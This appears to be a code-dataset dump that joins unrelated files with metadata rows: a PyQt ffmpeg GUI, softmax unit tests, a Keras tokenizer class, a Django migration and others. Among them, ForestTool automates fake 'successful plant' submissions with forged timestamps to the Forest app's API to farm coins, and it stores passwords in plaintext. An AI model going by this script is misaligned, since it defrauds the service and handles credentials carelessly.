for p in ['ffmpeg', 'ffplay', 'ffprobe']:
print("\t.", p, end=' ')
exe = self.getExe(p)
where = 'from PATH' if exe == p else 'from ffmpeg folder'
if exe:
print("found: %s (%s)" % (exe, where))
else:
print("NOT FOUND!")
if os.path.isdir(self.workspace_lineEdit.text()):
print("images:")
# convert sscanf format to regex: anim%4d.png => anim(\d{4}).png
regex = re.sub(
'(\\%(\\d)d)', '(\\\d{\\2})', self.filenames_lineEdit.text())
print("\t. pattern converted to regex:", regex)
pattern = re.compile(regex)
nofiles = 0
lowno = 0
highno = 0
self.pix = []
self.pixnames = []
for f in sorted(os.listdir(self.workspace_lineEdit.text())):
match = pattern.match(f)
if(match):
nofiles += 1
g = match.groups()
no = int(g[0])
highno = max(no, highno)
lowno = min(no, lowno)
self.pixnames.append(os.path.join(
self.workspace_lineEdit.text(), f))
print("\t. %d files found ranging from %d to %d" % (
nofiles, lowno, highno))
if len(self.pixnames):
progress = QProgressDialog(
"image", "Cancel", 0, len(self.pixnames), self)
progress.setWindowModality(Qt.WindowModal)
progress.setWindowTitle("Building preview...")
progress.setValue(0)
progress.forceShow()
for i, f in enumerate(self.pixnames):
progress.setValue(i+1)
progress.setLabelText(f)
if progress.wasCanceled():
self.pix = []
self.pixname = []
lowno = 0
highno = 100
break
img = QPixmap(f) # loads original image
# reduce img size if too large
w = min(img.width(), 500)
img_scaled = img.scaledToWidth(w, Qt.SmoothTransformation)
self.pix.append(img_scaled)
if len(self.pix):
self.img_Label.setPixmap(self.pix[0])
else:
self.img_Label.setText("No preview")
self.img_Slider.setMinimum(lowno)
self.img_Slider.setMaximum(highno)
def on_img_Slider_valueChanged(self):
no = self.img_Slider.value()
QToolTip.showText(QCursor.pos(), "%d" % no)
#print "slider =",no
if len(self.pix) > no:
self.img_Label.setPixmap(self.pix[no])
def checkExe(self, exe):
try:
# try to call it (with a dummy arg - faster than -h)
with open(os.devnull, 'w') as FNULL:
subprocess.call([exe, '-prout'], stdout=FNULL,
stderr=subprocess.STDOUT)
return exe
except OSError:
return ""
def getExe(self, exename):
# try the provided folder name
if self.ffmpegfolder_lineEdit.text():
exeinfolder = os.path.join(
self.ffmpegfolder_lineEdit.text(), exename)
exe = self.checkExe(exeinfolder)
if exe:
return exe
# try ffmpeg in the PATH
return self.checkExe(exename)
def on_convert_Button_pressed(self):
exeffmpeg = self.getExe("ffmpeg")
if not exeffmpeg:
QMessageBox.critical(
self, 'Error', 'ffmpeg does not exist/work!\nCheck ffmpeg path.')
cmd = []
cmd.append(exeffmpeg)
cmd.append('-y')
# cmd +="-r %s " %
cmd.extend(['-r', self.input_fps_lineEdit.text()])
# check workspace folder
wrkdir = self.workspace_lineEdit.text()
if not os.path.isdir(wrkdir):
QMessageBox.critical(
self, 'Error', 'The workspace folder does not exist!')
return
inpfiles = os.path.join(
self.workspace_lineEdit.text(), self.filenames_lineEdit.text())
#cmd +="-i %s " % inpfiles
cmd.extend(['-i', inpfiles])
#cmd +="-vf fps=%s " % self.output_fps_lineEdit.text()
cmd.extend(['-vf', 'fps=%s' % self.output_fps_lineEdit.text()])
#cmd +="-c:v libx264 "
cmd.extend(['-c:v', 'libx264'])
#cmd +="-crf %d " % self.quality_Slider.value()
cmd.extend(['-crf', '%d' % self.quality_Slider.value()])
#cmd +="-pix_fmt yuv420p "
cmd.extend(['-pix_fmt', 'yuv420p'])
# cmd +="-vf \"scale=trunc(iw/2)*2:trunc(ih/2)*2\" " # scale if not multiple of 2
#cmd +="-vf \"scale=trunc(iw/2)*2:trunc(ih/2)*2, setsar=1\" "
# cmd +="-vf \"crop=trunc(iw/2)*2:trunc(ih/2)*2:0:0\" " # crop to odd dimensions...
cmd.extend(['-vf', 'crop=trunc(iw/2)*2:trunc(ih/2)*2:0:0'])
# check output folder
outdir = self.outdir_lineEdit.text()
if not os.path.isdir(outdir):
QMessageBox.critical(
self, 'Error', 'The output folder does not exist!')
return
# check / correct output filename
outname = self.outname_lineEdit.text()
if outname == '':
outname = 'video.mp4'
base, ext = os.path.splitext(outname)
if(ext != '.mp4'):
outname = outname+'.mp4'
self.outname_lineEdit.setText(outname)
# check whether output file will be overwritten
outfile = os.path.join(self.outdir_lineEdit.text(),
self.outname_lineEdit.text())
if os.path.isfile(outfile):
reply = QMessageBox.question(self, 'Message',
"The output file already exists. Do you want to overwrite it?",
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.No:
print("output file exists - operation cancelled.")
return
cmd.append(outfile)
print("running ffmpeg...")
print('\t', cmd)
# sous linux, cmd doit etre une liste a moins que shell=True (pas safe)
# dans ce cas, python se charge d'ajouter des guillemets là ou il faut.
# sous windows, ca marche sans shell=True avec une bete string.
# => on utilise une liste
retcode = subprocess.call(cmd)
print("\tretcode =", retcode)
def on_ffmpegfolder_Button_pressed(self):
dir = QFileDialog.getExistingDirectory(
self, "Find ffmpeg folder", self.ffmpegfolder_lineEdit.text())
if dir:
self.ffmpegfolder_lineEdit.setText(QDir.toNativeSeparators(dir))
def on_workspace_Button_pressed(self):
dir = QFileDialog.getExistingDirectory(
self, "Find workspace folder", self.workspace_lineEdit.text())
if dir:
self.workspace_lineEdit.setText(QDir.toNativeSeparators(dir))
def on_outdir_Button_pressed(self):
dir = QFileDialog.getExistingDirectory(
self, "Choose output folder", self.outdir_lineEdit.text())
if dir:
self.outdir_lineEdit.setText(QDir.toNativeSeparators(dir))
def closeEvent(self, event):
# save settings to registry
settings = QSettings()
settings.setValue("Geometry", QVariant(self.saveGeometry()))
settings.setValue("ffmpegfolder", QVariant(
self.ffmpegfolder_lineEdit.text()))
settings.setValue("workspace", QVariant(
self.workspace_lineEdit.text()))
settings.setValue("filenames", QVariant(
self.filenames_lineEdit.text()))
settings.setValue("outdir", QVariant(
self.outdir_lineEdit.text()))
settings.setValue("outname", QVariant(
self.outname_lineEdit.text()))
settings.setValue("input_fps", QVariant(
self.input_fps_lineEdit.text()))
settings.setValue("output_fps", QVariant(
self.output_fps_lineEdit.text()))
settings.setValue("quality", QVariant(self.quality_Slider.value()))
event.accept()
def write(self, stuff):
"stdio redirection"
if '\n' in stuff:
list(map(self.writeLine, stuff.split("\n")))
else:
self.buf += stuff
qApp.processEvents()
def flush(self): # required by py3 stdout redirection
pass
def writeLine(self, stuff):
"stdio redirection"
if len(self.buf):
stuff = self.buf + stuff
self.buf = ''
self.textEdit.append(stuff)
else:
if stuff != '':
self.textEdit.append(stuff)
def main():
app = QApplication(sys.argv)
app.setOrganizationName("RoBo")
app.setApplicationName("ffmpeg_GUI")
win = Window()
win.setWindowTitle('%s' % os.path.basename(sys.argv[0]))
win.show()
app.lastWindowClosed.connect(app.quit)
sys.exit(app.exec_())
if __name__ == "__main__":
main()
| 36.859116 | 104 | 0.561643 | 12,110 | 0.907524 | 0 | 0 | 0 | 0 | 0 | 0 | 3,281 | 0.245878 |
eaae12f421ef051bdaca1bac1d8f9528a09f72e1 | 4,036 | py | Python | tests/nn/softmax_test.py | kbrodt/tor4 | d09740b746c534e67a72f492c7c03654f5888a46 | [
"MIT"
] | null | null | null | tests/nn/softmax_test.py | kbrodt/tor4 | d09740b746c534e67a72f492c7c03654f5888a46 | [
"MIT"
] | null | null | null | tests/nn/softmax_test.py | kbrodt/tor4 | d09740b746c534e67a72f492c7c03654f5888a46 | [
"MIT"
] | null | null | null | import numpy as np
import tor4
import tor4.nn as nn
def test_softmax():
a = tor4.tensor(data=[0, 0, 0.0])
a_sm = nn.functional.softmax(a, dim=0)
assert not a_sm.requires_grad
assert a_sm.tolist() == [1 / 3, 1 / 3, 1 / 3]
def test_softmax2():
a = tor4.tensor(data=[[0, 0, 0], [0, 0, 0.0]])
a_sm0 = nn.functional.softmax(a, dim=0)
a_sm1 = nn.functional.softmax(a, dim=1)
assert not a_sm0.requires_grad
assert a_sm0.tolist() == [[1 / 2, 1 / 2, 1 / 2], [1 / 2, 1 / 2, 1 / 2]]
assert not a_sm1.requires_grad
assert a_sm1.tolist() == [[1 / 3, 1 / 3, 1 / 3], [1 / 3, 1 / 3, 1 / 3]]
def test_softmax_backward():
a = tor4.tensor(data=[0, 0, 0.0], requires_grad=True)
a_sm = nn.functional.softmax(a, dim=-1)
a_sm.backward(tor4.tensor([1, 1, 1.0]))
assert a_sm.requires_grad
assert a_sm.tolist() == [1 / 3, 1 / 3, 1 / 3]
assert a.grad.tolist() == [0, 0, 0]
def test_softmax_backward2():
a = tor4.tensor(data=[0, 0, 0.0], requires_grad=True)
a_sm = nn.functional.softmax(a, dim=-1)
a_sm.backward(tor4.tensor([0, 1, -1.0]))
assert a_sm.requires_grad
assert a_sm.tolist() == [1 / 3, 1 / 3, 1 / 3]
assert a.grad.tolist() == [0, 1 / 3, -1 / 3]
def test_softmax2d_backward():
a = tor4.tensor(data=[[0, 1, -1.0], [1, -2, 3]], requires_grad=True)
a_sm = nn.functional.softmax(a, dim=-1)
a_sm.backward(tor4.tensor([[1, 1, 1.0], [1, 1, 1]]))
assert a_sm.requires_grad
assert np.allclose(
a_sm.tolist(),
[[0.2447, 0.6652, 0.09], [0.1185, 0.0059, 0.8756]],
atol=1e-4,
rtol=1e-4,
)
assert np.allclose(a.grad.tolist(), [[0, 0, 0], [0, 0, 0]])
def test_softmax2d_backward2():
a = tor4.tensor(data=[[0, 1, -1.0], [1, -2, 3]], requires_grad=True)
a_sm = nn.functional.softmax(a, dim=0)
a_sm.backward(tor4.tensor([[1, 1, 1.0], [1, 1, 1]]))
assert a_sm.requires_grad
assert np.allclose(
a_sm.tolist(),
[[0.2689, 0.9526, 0.018], [0.7311, 0.0474, 0.982]],
atol=1e-4,
rtol=1e-4,
)
assert np.allclose(a.grad.tolist(), [[0, 0, 0], [0, 0, 0]])
def test_softmax2d_backward3():
a = tor4.tensor(data=[[0, 1, -1.0], [1, -2, 3]], requires_grad=True)
a_sm = nn.functional.softmax(a, dim=-1)
a_sm.backward(tor4.tensor([[0, -1, 1.0], [2, 0, -1]]))
assert a_sm.requires_grad
assert np.allclose(
a_sm.tolist(),
[[0.2447, 0.6652, 0.09], [0.1185, 0.0059, 0.8756]],
atol=1e-4,
rtol=1e-4,
)
assert np.allclose(
a.grad.tolist(),
[[0.1408, -0.2826, 0.1418], [0.3127, 0.0038, -0.3164]],
atol=1e-4,
rtol=1e-4,
)
def test_softmax2d_backward4():
a = tor4.tensor(data=[[0, 1, -1.0], [1, -2, 3]], requires_grad=True)
a_sm = nn.functional.softmax(a, dim=0)
a_sm.backward(tor4.tensor([[-5, 3, 0.0], [0, 0, 1]]))
assert a_sm.requires_grad
assert np.allclose(
a_sm.tolist(),
[[0.2689, 0.9526, 0.018], [0.7311, 0.0474, 0.982]],
atol=1e-4,
rtol=1e-4,
)
assert np.allclose(
a.grad.tolist(),
[[-0.9831, 0.1355, -0.0177], [0.9831, -0.1355, 0.0177]],
atol=1e-4,
rtol=1e-4,
)
def test_softmax3d_backward():
a = tor4.tensor(
data=[[[0, 1, -1.0], [1, -2, 3]], [[1, 4, -2], [0, 0, -3]]], requires_grad=True,
)
a_sm = nn.functional.softmax(a, dim=1)
a_sm.backward(tor4.tensor([[[-5, 3, 0.0], [0, 0, 1]], [[3, 0, -3], [1, 2, 3]]]))
assert a_sm.requires_grad
assert np.allclose(
a_sm.tolist(),
[
[[0.2689, 0.9526, 0.018], [0.7311, 0.0474, 0.982]],
[[0.7311, 0.982, 0.7311], [0.2689, 0.018, 0.2689]],
],
atol=1e-4,
rtol=1e-4,
)
assert np.allclose(
a.grad.tolist(),
[
[[-0.9831, 0.1355, -0.0177], [0.9831, -0.1355, 0.0177]],
[[0.3932, -0.0353, -1.1797], [-0.3932, 0.0353, 1.1797]],
],
atol=1e-4,
rtol=1e-4,
)
| 28.422535 | 88 | 0.529485 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
eaae13d630098d1fed2c11aa237be653fb511af0 | 8,316 | py | Python | ForestTool(Python2)/Main.py | paltis5212/ForestTool | d49026c257c88e994c8b568906ae57500d71778b | [
"MIT"
] | 9 | 2019-05-11T04:42:22.000Z | 2022-03-05T03:54:19.000Z | ForestTool(Python2)/Main.py | paltis5212/ForestTool | d49026c257c88e994c8b568906ae57500d71778b | [
"MIT"
] | 4 | 2019-06-03T12:15:47.000Z | 2022-02-27T15:11:16.000Z | ForestTool(Python2)/Main.py | SmileZXLee/ForestTool | 9becb37298b86409b8ef7196969391078e39b902 | [
"MIT"
] | 8 | 2019-11-26T09:52:13.000Z | 2022-02-27T14:38:54.000Z | #coding=utf-8
__author__ = 'zxlee'
__github__ = 'https://github.com/SmileZXLee/forestTool'
import json
import time
import HttpReq
from User import User
from datetime import datetime,timedelta
import sched
import sys
import os
import platform
from dateutil.parser import parse
#是否是Windows
os_is_windows = platform.system() == 'Windows'
#种植成功时间
global plant_succ_time
plant_succ_time = datetime.now()
#程序入口
def main():
print(u'欢迎使用ForestTool')
try:
with open('user_login.txt', 'r') as f:
user_login_list = f.readlines()
if len(user_login_list) == 2:
s_account = user_login_list[0].strip('\n')
s_pwd = user_login_list[1].strip('\n')
login_input = {'account':s_account,'pwd':s_pwd}
else:
login_input = get_login()
except IOError:
login_input = get_login()
login(login_input)
#根据系统获取raw_input中文编码结果
def gbk_encode(str):
if os_is_windows:
return str.decode('utf-8').encode('gbk')
else:
return str
#获取用户输入的账号和密码
def get_login():
account = raw_input(gbk_encode('请输入您的账号: ')).decode(sys.stdin.encoding)
pwd = raw_input(gbk_encode('请输入您的密码: ')).decode(sys.stdin.encoding)
return {'account':account,'pwd':pwd}
#获取批量植树功能的用户选择信息
def get_add_time():
add_time = raw_input(gbk_encode('请输入专注时间(分钟): '))
tree_type = raw_input(gbk_encode('请选择植物类型【1.开花的树 2.树屋 3.鸟巢 4.柠檬树 5.三兄弟 6.树丛 7.章鱼 8.樱花 9.椰子树 10.猫咪 11.一株很大的草 12.中国松 13.仙人掌球 14.南瓜 15.稻草人 16.圣诞树 17.中国新年竹 18.蘑菇 19.仙人掌 20.银杏 21.紫藤 22.西瓜 23.竹子 24.糖果树 25.向日葵 26.玫瑰 27.枫树 28.面包树 29.大王花 30.香蕉】,无论是否已购买都可以种植,超出30的植物有兴趣可以自行测试: ')).decode(sys.stdin.encoding)
note = raw_input(gbk_encode('请输入此任务备注: ')).decode(sys.stdin.encoding)
add_count = raw_input(gbk_encode('请输入批量植树数量: ')).decode(sys.stdin.encoding)
return {'add_time':add_time,'tree_type':tree_type,'note':note,'add_count':add_count}
#获取刷金币功能的用户选择信息
def get_coin_task():
add_time = raw_input(gbk_encode('请输入每棵树种植时间(分钟)【5-120分钟,每5分钟一阶段,每增加1阶段多1金币,第一阶段2金币】: ')).decode(sys.stdin.encoding)
tree_type = raw_input(gbk_encode('请选择植物类型【1.开花的树 2.树屋 3.鸟巢 4.柠檬树 5.三兄弟 6.树丛 7.章鱼 8.樱花 9.椰子树 10.猫咪 11.一株很大的草 12.中国松 13.仙人掌球 14.南瓜 15.稻草人 16.圣诞树 17.中国新年竹 18.蘑菇 19.仙人掌 20.银杏 21.紫藤 22.西瓜 23.竹子 24.糖果树 25.向日葵 26.玫瑰 27.枫树 28.面包树 29.大王花 30.香蕉】,无论是否已购买都可以种植,超出30的植物有兴趣可以自行测试: ')).decode(sys.stdin.encoding)
note = raw_input(gbk_encode('请输入此任务备注: ')).decode(sys.stdin.encoding)
return {'add_time':add_time,'tree_type':tree_type,'note':note}
#获取刷金币功能的用户选择信息
def get_dis_add():
start_time = raw_input(gbk_encode('请输入开始时间(格式:\'2019-01-01/11:11:11\'): ')).decode(sys.stdin.encoding)
end_time = raw_input(gbk_encode('请输入结束时间(格式:\'2019-01-01/11:11:11\'): ')).decode(sys.stdin.encoding)
tree_type = raw_input(gbk_encode('请选择植物类型【1.开花的树 2.树屋 3.鸟巢 4.柠檬树 5.三兄弟 6.树丛 7.章鱼 8.樱花 9.椰子树 10.猫咪 11.一株很大的草 12.中国松 13.仙人掌球 14.南瓜 15.稻草人 16.圣诞树 17.中国新年竹 18.蘑菇 19.仙人掌 20.银杏 21.紫藤 22.西瓜 23.竹子 24.糖果树 25.向日葵 26.玫瑰 27.枫树 28.面包树 29.大王花 30.香蕉】,无论是否已购买都可以种植,超出30的植物有兴趣可以自行测试: ')).decode(sys.stdin.encoding)
note = raw_input(gbk_encode('请输入此任务备注: ')).decode(sys.stdin.encoding)
return {'start_time':start_time,'end_time':end_time,'tree_type':tree_type,'note':note}
#获取用户选择菜单的信息
def get_mode():
mode_input = raw_input(gbk_encode('请选择您要进行的操作: 1.自动刷金币 2.批量植树 3.根据时间区间植树 4.使用其他账号登录 5.退出ForestTool: ')).decode(sys.stdin.encoding)
return mode_input
#前往菜单
def to_menu(user):
while(True):
mode_input = get_mode()
if mode_input == '1':
add_coin_task(user)
break
elif mode_input == '2':
add_time(user)
break
elif mode_input == '3':
add_dis_time(user)
break
elif mode_input == '4':
login(get_login())
break
elif mode_input == '5':
exit(0)
break
else:
print(u'您的输入不合法,请输入选择!!')
#用户登录
def login(login_input):
post_json = {
'session':{
'email':login_input['account'],
'password':login_input['pwd'],
},
'seekruid':''
}
print(u'正在登录,请稍后...')
res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/sessions',{},post_json,'','POST')
if res.has_key('remember_token'):
user = User(res['user_name'],res['user_id'],res['remember_token'])
print (u'登录成功!!欢迎您,'+ res['user_name'])
try:
with open('user_login.txt', 'w') as f:
f.write(login_input['account']+'\n')
f.write(login_input['pwd']+'\n')
except IOError:
print(u'IO异常,无法保存账号密码')
to_menu(user)
else:
print(u'登录失败,账号或密码错误,请重新输入!!')
login(get_login())
#批量植树功能
def add_time(user):
add_time_input = get_add_time()
add_time_data = int(add_time_input['add_time'])
tree_type = int(add_time_input['tree_type'])
print(u'正在执行,请稍后...')
note = add_time_input['note']
add_count = int(add_time_input['add_count'])
curr_count = 0
while curr_count<add_count:
curr_count = curr_count+1
add_per_time(add_time_data,note,tree_type,user,curr_count,'','')
time.sleep(1)
to_menu(user)
#种植一棵树
def add_per_time(add_time_data,note,tree_type,user,per_add_count,start_time,end_time):
time_now = datetime.now()
time_now = time_now - timedelta(hours = 8)
time_pass = time_now - timedelta(minutes = add_time_data)
if len(start_time):
s_start_time = start_time
else:
s_start_time = time_pass.isoformat()
if len(end_time):
s_end_time = end_time
else:
s_end_time = time_now.isoformat()
post_json = {
"plant": {
"end_time": s_end_time,
"longitude": 0,
"note": note,
"is_success": 1,
"room_id": 0,
"die_reason": '',
"tag": 0,
"latitude": 0,
"has_left": 0,
"start_time": s_start_time,
"trees": [{
"phase": 4,
"theme": 0,
"is_dead": 0,
"position": -1,
"tree_type": tree_type
}]
},
"seekruid": str(user.user_id)
}
print(u'植树中,请稍后...')
post_res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/plants',{},post_json,user.remember_token,'POST')
if not post_res.has_key('id'):
print(u'植树失败!!返回信息:'+post_res)
else:
get_res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/plants/updated_plants?seekruid='+ str(user.user_id)+'&update_since='+time_now.isoformat()+'/',{},'',user.remember_token,'GET')
now_time = datetime.now()
print(u'【%s】第%d棵树种植成功!!'%(now_time.strftime("%Y-%m-%d %H:%M:%S"),per_add_count))
global plant_succ_time
plant_succ_time = now_time;
#刷金币功能
def add_coin_task(user):
get_coin_input = get_coin_task()
add_time = int(get_coin_input['add_time'])
tree_type = get_coin_input['tree_type']
note = get_coin_input['note']
get_res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/users/'+str(user.user_id)+'/coin?seekruid='+ str(user.user_id),{},'',user.remember_token,'GET')
if get_res.has_key('coin'):
print(u'您当前金币数:'+str(get_res['coin']))
print(u'开始自动刷金币,每%d分钟植一棵树...'%add_time)
total_time = 0
curr_count = 1
while True:
if curr_count == 1 or (not total_time == 0 and total_time % (add_time * 60) == 0):
add_per_time(add_time,note,tree_type,user,curr_count,'','')
curr_count = curr_count+1
get_res_sub = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/users/'+str(user.user_id)+'/coin?seekruid='+ str(user.user_id),{},'',user.remember_token,'GET')
print(u'您当前金币数:'+str(get_res_sub['coin'])+u'(赚得金币数:'+str(get_res_sub['coin']-get_res['coin'])+')')
global plant_succ_time
total_time = int((datetime.now()-plant_succ_time).total_seconds())
if not total_time == add_time * 60:
sys.stdout.write('\r'+u'距离下一棵树种植时间 :' + str(add_time * 60 - total_time).zfill(len(str(add_time * 60))),)
sys.stdout.flush()
if total_time == add_time * 60:
print('')
time.sleep(1)
#根据时间区间种植树
def add_dis_time(user):
get_dis_input = get_dis_add()
start_time = parse(get_dis_input['start_time'])
end_time = parse(get_dis_input['end_time'])
tree_type = get_dis_input['tree_type']
note = get_dis_input['note']
s_start_time = start_time
s_start_time = s_start_time - timedelta(hours = 8)
end_time = end_time - timedelta(hours = 8)
curr_count = 0
while True:
curr_count = curr_count+1
add_per_time(10,note,tree_type,user,curr_count,s_start_time.isoformat(),(s_start_time + timedelta(minutes = 10)).isoformat())
s_start_time = s_start_time + timedelta(minutes = 10,seconds = 1)
print('下一棵树对应需求时间:'+(s_start_time + timedelta(hours = 8)).strftime("%Y-%m-%d %H:%M:%S"))
if int((end_time - s_start_time).total_seconds()) < 10:
print(u'执行完毕!!')
break;
time.sleep(1)
main()
| 34.65 | 298 | 0.69252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,125 | 0.415324 |
eaae876c415d71773fc2a99edab6f478ae373366 | 1,207 | py | Python | samples/sendRps.py | vsgobbi/Nfse-python | 5b2334e9e28e07186e8d38cda2ff7fe6ce62885d | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | samples/sendRps.py | vsgobbi/Nfse-python | 5b2334e9e28e07186e8d38cda2ff7fe6ce62885d | [
"Python-2.0",
"OLDAP-2.7"
] | 1 | 2021-12-13T20:09:32.000Z | 2021-12-13T20:09:32.000Z | samples/sendRps.py | vsgobbi/Nfse-python | 5b2334e9e28e07186e8d38cda2ff7fe6ce62885d | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | # -*- coding: utf-8 -*-
from services.Services import Services
# NFSe Provider
taxId = "87654321000198"
providerSubscription = "12345678" # Provider city subscription
# NFSe Taker
companyName = "SOME COMPANY LTDA"
takerTaxId = "12345678000198"
objServ = Services(
certificateContent=open("../certfiles/converted.crt", "rb").read(),
rsaKeyContent=open("../certfiles/privRSAkey.pem", "rb").read(),
privateKeyContent=open("../certfiles/privateKey.key", "rb").read()
)
print(objServ.sendRPS(
taxId=taxId,
providerSubscription=providerSubscription,
rpsSeries="TESTE",
rpsNumber="5117092019",
rpsType="RPS",
issueDate="2019-07-01",
rpsStatus="N",
rpsTax="T",
issRetain="false",
servicesAmount="1",
deductionsAmount="0",
pisAmount="0",
irAmount="0",
csllAmount="0",
cofinsAmount="0",
inssAmount="0",
serviceCode="05895",
aliquot="2",
takerTaxId=takerTaxId,
companyName=companyName,
streetLine="Null",
streetNumber="0",
streetLine2="Null",
district="Null",
zipCode="00000000",
email="none@none",
description="Teste de emissão automática de NFS-e de boletos e transferências prestados",
))
| 25.145833 | 93 | 0.672742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 438 | 0.361983 |
eaaee56b527744c35b0a2e71b0cf37879102767a | 208 | py | Python | python/course/leetcode/leetcode.py | TimVan1596/ACM-ICPC | 07f7d728db1ecd09c5a3d0f05521930b14eb9883 | [
"Apache-2.0"
] | 1 | 2019-05-22T07:12:34.000Z | 2019-05-22T07:12:34.000Z | python/course/leetcode/leetcode.py | TimVan1596/ACM-ICPC | 07f7d728db1ecd09c5a3d0f05521930b14eb9883 | [
"Apache-2.0"
] | 3 | 2021-12-10T01:13:54.000Z | 2021-12-14T21:18:42.000Z | python/course/leetcode/leetcode.py | TimVan1596/ACM-ICPC | 07f7d728db1ecd09c5a3d0f05521930b14eb9883 | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
# @Time:2020/6/15 11:38
# @Author:TimVan
# @File:leetcode.py
# @Software:PyCharm
# Definition for singly-linked list.
# for j in range(10, 5, -1):
# print(j)
print('a'.find(' '))
| 17.333333 | 36 | 0.605769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 183 | 0.879808 |
eaaefc430961e4bbb80f4767f28ce779a21dba1e | 1,337 | py | Python | inlp/text_preprocessing/KerasBow.py | Jie-Yuan/iNLP | 04fe919b9c1e613b1075c8eb1102556c188d48d6 | [
"MIT"
] | 9 | 2018-06-07T13:26:52.000Z | 2021-08-28T07:01:00.000Z | inlp/text_preprocessing/KerasBow.py | Jie-Yuan/iNLP | 04fe919b9c1e613b1075c8eb1102556c188d48d6 | [
"MIT"
] | null | null | null | inlp/text_preprocessing/KerasBow.py | Jie-Yuan/iNLP | 04fe919b9c1e613b1075c8eb1102556c188d48d6 | [
"MIT"
] | 2 | 2019-07-05T08:29:59.000Z | 2020-04-08T09:54:03.000Z | from keras.preprocessing.sequence import pad_sequences
from keras.preprocessing.text import Tokenizer
class KerasBow(object):
"""doc
词袋模型:我们可以为数据集中的所有单词制作一张词表,然后将每个单词和一个唯一的索引关联。
每个句子都是由一串数字组成,这串数字是词表中的独立单词对应的个数。
通过列表中的索引,我们可以统计出句子中某个单词出现的次数。
"""
def __init__(self, num_words=20000, maxlen=None):
"""
:param maxlen: 句子序列最大长度
:param num_words: top num_words-1(词频降序):保留最常见的num_words-1词
"""
self.maxlen = maxlen
self.num_words = num_words
self.tokenizer = None
def fit(self, docs):
"""
:param corpus: ['some thing to do', 'some thing to drink']与sklearn提取文本特征一致
"""
print('Create Bag Of Words ...')
self.tokenizer = Tokenizer(self.num_words, lower=False) # 不改变大小写(需提前预处理)
self.tokenizer.fit_on_texts(docs)
print("Get Unique Words In Corpus: %s" % len(self.tokenizer.word_index))
return self
def transform(self, docs):
print('Docs To Sequences ...')
sequences = self.tokenizer.texts_to_sequences(docs)
pad_docs = pad_sequences(sequences, self.maxlen, padding='post')
if self.maxlen is None:
self.maxlen = pad_docs.shape[1]
return pad_docs
def fit_transform(self, docs):
self.fit(docs)
return self.transform(docs)
| 31.833333 | 82 | 0.644727 | 1,530 | 0.93578 | 0 | 0 | 0 | 0 | 0 | 0 | 747 | 0.456881 |
eaaf85302a7e40e5b38b9e1a9f53748e0813d733 | 1,300 | py | Python | trojsten/people/migrations/0011_auto_20170218_1724.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 5 | 2018-04-22T22:44:02.000Z | 2021-04-26T20:44:44.000Z | trojsten/people/migrations/0011_auto_20170218_1724.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 250 | 2018-04-24T12:04:11.000Z | 2022-03-09T06:56:47.000Z | trojsten/people/migrations/0011_auto_20170218_1724.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 8 | 2019-04-28T11:33:03.000Z | 2022-02-26T13:30:36.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.9.12 on 2017-02-18 16:24
from django.db import migrations
countries = {
"Ma\u010farsko": "HU",
"Czech Republic": "CZ",
"\u010cesk\xe1 republika": "CZ",
"United Kingdom": "GB",
"Austria": "AT",
"Madarsko": "HU",
"Australia": "AU",
"Srbsko": "RS",
"Kraj Vyso\u010dina, \u010cesk\xe1 republika": "CZ",
"\u010desk\xe1 republika": "CZ",
"\u010cR": "CZ",
"Plze\u0148sk\xfd kraj, \u010cesk\xe1 republika": "CZ",
"Sverige": "SE",
"serbia": "RS",
"\xd6sterreich": "AT",
"Switzerland": "CH",
"ma\u010farsk\xe1 \u013eudovo demokratick\xe1 ": "HU",
"Kosovo": "RS",
"India": "IN",
"Uzbekistan": "UZ",
"Uganda": "UG",
"litva": "LT",
"Velka Britania": "GB",
}
def fix_country_names(apps, schema_editor):
# We can't import the Person model directly as it may be a newer
# version than this migration expects. We use the historical version.
Address = apps.get_model("people", "Address")
for address in Address.objects.all():
address.country = countries.get(address.country, "SK")
address.save()
class Migration(migrations.Migration):
dependencies = [("people", "0010_merge")]
operations = [migrations.RunPython(fix_country_names)]
| 28.888889 | 73 | 0.614615 | 144 | 0.110769 | 0 | 0 | 0 | 0 | 0 | 0 | 724 | 0.556923 |
eab048820d03b22884f75124f36991ec3018d628 | 249 | py | Python | test/test_commands/test_tail.py | Rudedog9d/pypsi | 38dda442b21b8deb569d61076ab0a19c0e78edc8 | [
"0BSD"
] | 18 | 2015-01-07T19:05:29.000Z | 2022-01-09T02:33:23.000Z | test/test_commands/test_tail.py | Rudedog9d/pypsi | 38dda442b21b8deb569d61076ab0a19c0e78edc8 | [
"0BSD"
] | 30 | 2015-02-19T16:04:04.000Z | 2021-03-30T00:09:58.000Z | test/test_commands/test_tail.py | Rudedog9d/pypsi | 38dda442b21b8deb569d61076ab0a19c0e78edc8 | [
"0BSD"
] | 7 | 2016-01-02T17:55:48.000Z | 2020-11-22T14:52:32.000Z | from pypsi.shell import Shell
from pypsi.commands.tail import TailCommand
class CmdShell(Shell):
tail = TailCommand()
class TestTail:
def setup(self):
self.shell = CmdShell()
def teardown(self):
self.shell.restore()
| 16.6 | 43 | 0.678715 | 170 | 0.682731 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
eab1a5938cae0856924b0791262652f15b84a805 | 20,322 | py | Python | linuxOperation/app/domain/constants.py | zhouli121018/core | f9700204349ecb22d45e700e9e27e79412829199 | [
"MIT"
] | null | null | null | linuxOperation/app/domain/constants.py | zhouli121018/core | f9700204349ecb22d45e700e9e27e79412829199 | [
"MIT"
